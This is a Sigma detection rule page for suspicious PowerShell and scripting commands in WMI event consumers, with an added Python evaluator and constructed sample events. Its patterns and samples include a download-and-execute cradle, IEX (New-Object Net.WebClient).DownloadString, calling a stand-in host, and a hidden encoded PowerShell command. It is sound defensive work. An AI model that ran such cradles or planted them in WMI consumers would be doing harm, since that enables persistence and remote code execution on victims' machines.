
Suspicious Scripting in a WMI Consumer

Detects suspicious commands related to scripting or PowerShell in WMI event consumers.

Authors: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
Created: Mon Apr 15 · Updated: Sat Sep 09
Rule ID: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0 · Product: windows
Log Source
Product: Windows (raw: windows)
Category: WMI Event (raw: wmi_event)
Detection Logic (1 selector)
detection:
    selection_destination:
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadstring'
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadfile'
        - Destination|contains:
              - ' iex('
              - ' -nop '
              - ' -noprofile '
              - ' -decode '
              - ' -enc '
              - 'WScript.Shell'
              - 'System.Security.Cryptography.FromBase64Transform'
    condition: selection_destination
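To show how the selector above is evaluated, here is an added, self-contained Python evaluator (it is not part of the Sigma project or of any Sigma backend) that implements the two matching modes the rule uses, `contains|all` (every pattern must be present) and `contains` (any one pattern suffices), both case-insensitive as in Sigma, and runs them over a handful of constructed Sysmon Event ID 20 style records. The event field names and the sample consumer names and commands are assumptions made for the example; only the patterns, rule ID and level come from the rule.

```python
"""Toy evaluator for the 'Suspicious Scripting in a WMI Consumer' selector.
Added example; not code from the Sigma project or any Sigma converter."""

RULE_ID = "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0"
RULE_LEVEL = "high"

# Patterns copied from selection_destination. Each alternative is a
# (mode, patterns) pair; the selector matches when ANY alternative matches.
SELECTION_DESTINATION = [
    ("all", ["new-object", "net.webclient", ".downloadstring"]),
    ("all", ["new-object", "net.webclient", ".downloadfile"]),
    ("any", [" iex(", " -nop ", " -noprofile ", " -decode ", " -enc ",
             "WScript.Shell",
             "System.Security.Cryptography.FromBase64Transform"]),
]


def present_patterns(value: str, patterns: list[str]) -> list[str]:
    """Sigma 'contains' is a case-insensitive substring test; return the
    patterns that occur in value, in rule order."""
    haystack = value.lower()
    return [p for p in patterns if p.lower() in haystack]


def contains(value: str, patterns: list[str], mode: str) -> bool:
    """'all' mirrors contains|all, anything else mirrors plain contains."""
    hits = present_patterns(value, patterns)
    return len(hits) == len(patterns) if mode == "all" else bool(hits)


def matched_patterns(event: dict) -> list[str]:
    """Every pattern from every alternative that fired, for analyst context."""
    destination = event.get("Destination", "")
    out: list[str] = []
    for mode, patterns in SELECTION_DESTINATION:
        if contains(destination, patterns, mode):
            out.extend(p for p in present_patterns(destination, patterns) if p not in out)
    return out


def matches(event: dict) -> bool:
    """condition: selection_destination"""
    return bool(matched_patterns(event))


def evaluate(events: list[dict]) -> list[dict]:
    """Run the rule over a batch and return one alert per matching consumer."""
    return [
        {"consumer": ev["Name"], "level": RULE_LEVEL, "rule_id": RULE_ID,
         "matched": matched_patterns(ev)}
        for ev in events if matches(ev)
    ]


# Constructed sample records modelled on Sysmon Event ID 20 (WmiEvent consumer
# activity). Names, commands and field layout are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 20, "Name": "BackupConsumer", "Type": "Command Line",
     "Destination": r'powershell.exe -File "C:\Scripts\nightly-backup.ps1"'},
    {"EventID": 20, "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -NoP -W Hidden -Enc AAAA"},
    {"EventID": 20, "Name": "Loader", "Type": "Command Line",
     "Destination": "powershell -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a')\""},
    {"EventID": 20, "Name": "Legacy", "Type": "Script",
     "Destination": 'Set sh = CreateObject("WScript.Shell"): sh.Run "notepad.exe"'},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The first record (a signed maintenance script started with `-File`) produces no alert, which is the "legitimate administrative scripts" case the rule lists under false positives; the other three fire on different alternatives. Note that several of the plain `contains` patterns carry leading and trailing spaces (`' -nop '`, `' -enc '`), so the rule keys on the switch appearing as a separate token, and `' iex('` needs the parenthesis directly after the cmdlet; the `contains|all` download-cradle alternatives do not have that restriction.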
False Positives

Legitimate administrative scripts

MITRE ATT&CK
Execution (TA0002) · Command and Scripting Interpreter: Visual Basic (T1059.005)
Rule Metadata
Rule ID
fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
Status
test
Level
high
Type
Detection
Created
Mon Apr 15
Modified
Sat Sep 09
Path
rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
Raw Tags
attack.execution, attack.t1059.005